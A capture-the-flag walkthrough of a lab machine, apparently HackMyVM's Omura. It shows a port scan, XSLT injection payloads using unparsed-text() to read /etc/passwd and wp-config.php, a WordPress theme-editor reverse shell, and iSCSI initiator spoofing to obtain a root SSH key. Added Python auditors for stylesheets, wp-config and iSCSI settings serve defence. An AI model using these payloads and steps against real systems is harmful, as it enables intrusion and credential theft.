The target machine's IP is 192.168.56.105

Port scan

sudo nmap --min-rate 10000 -p- 192.168.56.105
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-05 09:33 UTC
Nmap scan report for 192.168.56.105 (192.168.56.105)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3260/tcp open iscsi
MAC Address: 08:00:27:FA:75:8C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.30 seconds
sudo nmap -sT -sV -sC -O -p22,80,3260 192.168.56.105
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-05 09:33 UTC
Nmap scan report for 192.168.56.105 (192.168.56.105)
Host is up (0.00037s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
|_ 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: XSLT Transformation
|_http-server-header: Apache/2.4.54 (Debian)
3260/tcp open iscsi Synology DSM iSCSI
| iscsi-info:
| iqn.2023-02.omura.hmv:target01:
| Address: 192.168.56.105:3260,1
| Authentication: required
|_ Auth reason: Authorization failure
MAC Address: 08:00:27:FA:75:8C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.90 seconds

A web service and an iSCSI service are exposed

Web (Getshell)

The homepage says it can convert XML files into other formats; no idea how to use that yet. The scan turned up the hostname omura.hmv, so add it to hosts and scan for subdomains. There turns out to be a wordpress subdomain; add that too.

After visiting it, it looks like the password could be brute-forced; there is a user named "admin"

wpscan --url=http://wordpress.omura.hmv/ -P /usr/share/wordlists/rockyou.txt -U admin

But the brute force finds nothing, and there are no plugin vulnerabilities either; out of ideas (sad)

Let's look at the article the WP site references

https://book.hacktricks.xyz/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations

As long as an xsl file can be stored on the server and then executed, this vulnerability can be exploited

The http://omura.hmv/ page lets us upload xsl files, and the transform runs on the Saxonica processor, so arbitrary files can be read

First create xml.xml (its content doesn't seem to matter)

<?xml version="1.0" encoding="UTF-8"?>
<catalog>
<cd>
<title>CD Title</title>
<artist>The artist</artist>
<company>Da Company</company>
<price>10000</price>
<year>1760</year>
</cd>
</catalog>

Then create read.xsl, which reads /etc/passwd and writes it into the generated output document

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

After uploading both and clicking execute, we successfully read the file contents!

Now read the contents of the /var/www/wordpress directory
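As an added example (my own code, not part of the writeup or the target application), here is a check a transform service could run on an uploaded stylesheet before handing it to the XSLT processor. It parses the XSL and flags calls to file-reading functions such as unparsed-text() and document(), declarations of extension namespaces such as the http://php.net/xsl one declared in read.xsl above, and include/import hrefs that point outside the upload. The function and constant names are mine, and READ_XSL is the writeup's stylesheet while BENIGN_XSL is a constructed harmless one. A denylist like this is only defense in depth: the real mitigation is to not transform untrusted stylesheets at all, or to configure the processor so it cannot resolve file and network URIs.

```python
import re
from io import StringIO
import xml.etree.ElementTree as ET

# XPath/XSLT functions that let a stylesheet read server files or fetch documents.
# Longer names first so the regex alternation does not stop at a prefix.
FILE_ACCESS_FUNCTIONS = (
    "unparsed-text-available", "unparsed-text-lines", "unparsed-text",
    "document", "doc", "collection",
)
# Namespaces that expose extension functions (PHP callbacks, Java reflection).
EXTENSION_NAMESPACES = (
    "http://php.net/xsl",
    "http://xml.apache.org/xalan/java",
    "http://saxon.sf.net/java-type",
)
_FUNC_CALL = re.compile(
    r"(?<![\w.-])(" + "|".join(re.escape(f) for f in FILE_ACCESS_FUNCTIONS) + r")\s*\("
)


def audit_stylesheet(xsl_source: str) -> list[str]:
    """Return a list of findings for an XSL document; an empty list means nothing was flagged."""
    findings: list[str] = []
    try:
        # start-ns events give us every namespace declaration; start events give attributes.
        for event, payload in ET.iterparse(StringIO(xsl_source), events=("start-ns", "start")):
            if event == "start-ns":
                prefix, uri = payload
                if uri in EXTENSION_NAMESPACES:
                    findings.append(f"extension namespace {uri} declared as xmlns:{prefix}")
                continue
            elem = payload
            local = elem.tag.split("}")[-1]
            # XPath expressions live in select/test attributes; include/import use href.
            for attr in ("select", "test", "href"):
                value = elem.get(attr)
                if value is None:
                    continue
                for match in _FUNC_CALL.finditer(value):
                    findings.append(f"<{local} {attr}> calls {match.group(1)}(): {value}")
                if attr == "href" and (value.startswith("/") or "://" in value):
                    findings.append(f"<{local} href> loads an external stylesheet: {value}")
    except ET.ParseError as exc:
        # Not well-formed XML is rejected outright rather than passed to the processor.
        findings.append(f"not well-formed XML: {exc}")
    return findings


# The stylesheet from the writeup (read.xsl).
READ_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>"""

# Constructed harmless stylesheet that only renders the catalog from xml.xml.
BENIGN_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<html><body>
<xsl:for-each select="catalog/cd"><p><xsl:value-of select="title"/></p></xsl:for-each>
</body></html>
</xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, src in (("read.xsl", READ_XSL), ("benign.xsl", BENIGN_XSL)):
        print(name, "->", audit_stylesheet(src) or "no findings")
```

Running it reports two findings for read.xsl (the PHP extension namespace and the unparsed-text() call) and none for the benign stylesheet.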

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/var/www/wordpress', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

The output is:

index.phplicense.txtreadme.htmlwordpresswp-activate.phpwp-adminwp-blog-header.phpwp-comments-post.phpwp-config.phpwp-contentwp-cron.phpwp-includeswp-links-opml.phpwp-load.phpwp-login.phpwp-mail.phpwp-settings.phpwp-signup.phpwp-trackback.phpxmlrpc.php

Read wp-config.php

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/var/www/wordpress/wp-config.php', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

We get sensitive information:

*/ define( 'DB_NAME', 'wordpressdb' ); /** Database username */ define( 'DB_USER', 'admin' ); /** Database password */ define( 'DB_PASSWORD', 'dw42k25MiXT' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /

Credentials obtained: admin/dw42k25MiXT

Log in to wordpress

Try replacing index.php with a PHP reverse shell

But saving the change throws an error:

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

Try switching the theme to edit (top right) to twenty-two

Start a listener, then visit:

http://wordpress.omura.hmv/wp-content/themes/twentytwo/index.php
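The foothold above depends on the WordPress theme editor being allowed to write PHP into the web root. As an added example (my own code, not from the writeup or WordPress), this Python function parses the define() lines of a wp-config.php and reports whether DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS are set, showing a weak configuration modelled on the fragment read earlier beside a hardened one. WEAK_CONFIG and HARDENED_CONFIG are constructed samples with placeholder secrets; the function names are mine.

```python
import re

# Matches PHP define( 'NAME', value ); where value is true/false or a quoted string.
_DEFINE = re.compile(
    r"""define\(\s*['"]([A-Za-z_]+)['"]\s*,\s*(true|false|['"][^'"]*['"])\s*\)""",
    re.IGNORECASE,
)


def parse_defines(config_text: str) -> dict[str, str]:
    """Return {CONSTANT: value} for every define() in a wp-config.php, quotes stripped."""
    return {name: value.strip("'\"") for name, value in _DEFINE.findall(config_text)}


def audit_wp_config(config_text: str) -> list[str]:
    """Report settings that let an authenticated admin turn into code execution."""
    defines = parse_defines(config_text)
    findings = []
    # Without DISALLOW_FILE_EDIT the theme/plugin editor can write arbitrary PHP.
    if defines.get("DISALLOW_FILE_EDIT", "false").lower() != "true":
        findings.append("DISALLOW_FILE_EDIT is not true: the theme/plugin editor can write PHP into the web root")
    # Without DISALLOW_FILE_MODS new plugins/themes can still be uploaded from the admin panel.
    if defines.get("DISALLOW_FILE_MODS", "false").lower() != "true":
        findings.append("DISALLOW_FILE_MODS is not true: plugins and themes can be installed from the admin panel")
    return findings


# Constructed sample in the shape of the fragment read via unparsed-text(); secrets are placeholders.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'wordpressdb' );
/** Database username */
define( 'DB_USER', 'admin' );
/** Database password */
define( 'DB_PASSWORD', 'REPLACE-WITH-DB-PASSWORD' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
"""

# The same file with the two hardening constants added.
HARDENED_CONFIG = WEAK_CONFIG + """
define( 'DISALLOW_FILE_EDIT', true );
define( 'DISALLOW_FILE_MODS', true );
"""

if __name__ == "__main__":
    print("weak:", audit_wp_config(WEAK_CONFIG))
    print("hardened:", audit_wp_config(HARDENED_CONFIG))
```

On the weak sample the check reports both constants missing; on the hardened one it reports nothing. Note that a value written as the string 'true' is also accepted, since WordPress treats it as truthy.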

Privilege escalation

Move the shell into msf

There is also a user named ford

Tried connecting to the database with the earlier credentials, but it doesn't seem to help.

Maybe port 3260 from earlier is the way in

Following this article:

https://book.hacktricks.xyz/network-services-pentesting/3260-pentesting-iscsi

First install open-iscsi

sudo apt-get install open-iscsi

On the target, we find this file:

/sys/kernel/config/target/iscsi/iqn.2023-02.omura.hmv:target01/tpgt_1/acls/iqn.2023-02.omura.hmv:node01.initiator01/fabric_statistics/iscsi_sess_stats

which shows that the authorized initiator is iqn.2023-02.omura.hmv:node01.initiator01

Edit /etc/iscsi/initiatorname.iscsi on kali and add:

InitiatorName=iqn.2023-02.omura.hmv:node01.initiator01

Edit /etc/iscsi/initiatorname.iscsi and uncomment:

# Startup settings

#*****************

# To request that the iscsi service scripts startup a session, use "automatic":

node.startup = automatic

Restart the services

sudo systemctl restart iscsid open-iscsi

Confirm the target

sudo iscsiadm -m discovery -t sendtargets -p 192.168.56.105

Connect:

sudo iscsiadm -m node --login
sudo fdisk -l

A new /dev/sdb disk appears; mount it to a directory

mkdir /tmp/omura
sudo mount /dev/sdb /tmp/omura

We get an SSH private key that can be used to log in as root!
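What made this step work is that the target's ACL admitted an initiator on its IQN alone: "Authentication: required" in the nmap output only meant the initiator name had to match, and that name was readable from configfs. As an added example (my own code, not from the writeup), here is a Python audit of a LIO configfs tree that flags target portal groups where attrib/authentication is not 1, where generate_node_acls is enabled, and ACLs without CHAP userid/password. The paths follow the LIO layout under /sys/kernel/config/target/iscsi/<iqn>/tpgt_N/ as I know it; verify them on your kernel. The tree is rebuilt in a temporary directory so the example runs offline: the weak target reuses the IQNs from the writeup, and the hardened one is constructed with a placeholder secret.

```python
import tempfile
from pathlib import Path


def _read_value(path: Path):
    """Return the stripped contents of a configfs attribute, or None if it is absent."""
    try:
        return path.read_text().strip()
    except OSError:
        return None


def audit_iscsi_targets(config_root: str) -> dict:
    """Audit every target portal group under <config_root>/iscsi.

    Returns {"<target iqn>/tpgt_N": [findings]}; an empty list means the TPG
    enforces CHAP and every ACL carries credentials.
    """
    report = {}
    for target in sorted((Path(config_root) / "iscsi").glob("iqn.*")):
        for tpg in sorted(target.glob("tpgt_*")):
            findings = []
            # authentication=1 makes LIO demand CHAP at login; otherwise the IQN is enough.
            if _read_value(tpg / "attrib" / "authentication") != "1":
                findings.append("attrib/authentication != 1: CHAP is not enforced, "
                                "an initiator is admitted on its IQN alone")
            # generate_node_acls=1 is demo mode: any initiator name gets an ACL.
            if _read_value(tpg / "attrib" / "generate_node_acls") == "1":
                findings.append("attrib/generate_node_acls = 1: any initiator IQN is accepted")
            for acl in sorted((tpg / "acls").glob("iqn.*")):
                userid = _read_value(acl / "auth" / "userid")
                password = _read_value(acl / "auth" / "password")
                if not (userid and password):
                    findings.append(f"acls/{acl.name}: no CHAP userid/password configured")
            report[f"{target.name}/{tpg.name}"] = findings
    return report


def _write(path: Path, value: str) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(value + "\n")


def build_sample_tree(root: str) -> str:
    """Construct a fake configfs tree (sample data) with one weak and one hardened target."""
    base = Path(root) / "iscsi"
    # Weak target, modelled on the writeup: one ACL for a known IQN, no CHAP.
    weak = base / "iqn.2023-02.omura.hmv:target01" / "tpgt_1"
    _write(weak / "attrib" / "authentication", "0")
    _write(weak / "attrib" / "generate_node_acls", "0")
    weak_acl = weak / "acls" / "iqn.2023-02.omura.hmv:node01.initiator01"
    _write(weak_acl / "auth" / "userid", "")
    _write(weak_acl / "auth" / "password", "")
    # Hardened target (constructed): CHAP enforced and credentials set on the ACL.
    hard = base / "iqn.2024-01.example.lab:hardened" / "tpgt_1"
    _write(hard / "attrib" / "authentication", "1")
    _write(hard / "attrib" / "generate_node_acls", "0")
    hard_acl = hard / "acls" / "iqn.2024-01.example.lab:node01.initiator01"
    _write(hard_acl / "auth" / "userid", "initiator01")
    _write(hard_acl / "auth" / "password", "REPLACE-WITH-CHAP-SECRET")
    return str(Path(root))


def run_demo() -> dict:
    """Build the sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_iscsi_targets(build_sample_tree(tmp))


if __name__ == "__main__":
    for tpg, findings in run_demo().items():
        print(tpg, "->", findings or "ok")
    # On a real target run: audit_iscsi_targets("/sys/kernel/config/target")
```

The weak target gets two findings (no CHAP enforced, ACL without credentials) and the hardened one none. Even with CHAP in place, keeping the initiator IQN out of world-readable locations and restricting port 3260 to the storage network closes the path used above.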

Afterthoughts

Reading files through xsl and xml was pretty fun lol, but the iSCSI service is rather obscure; I doubt I'll run into it again lol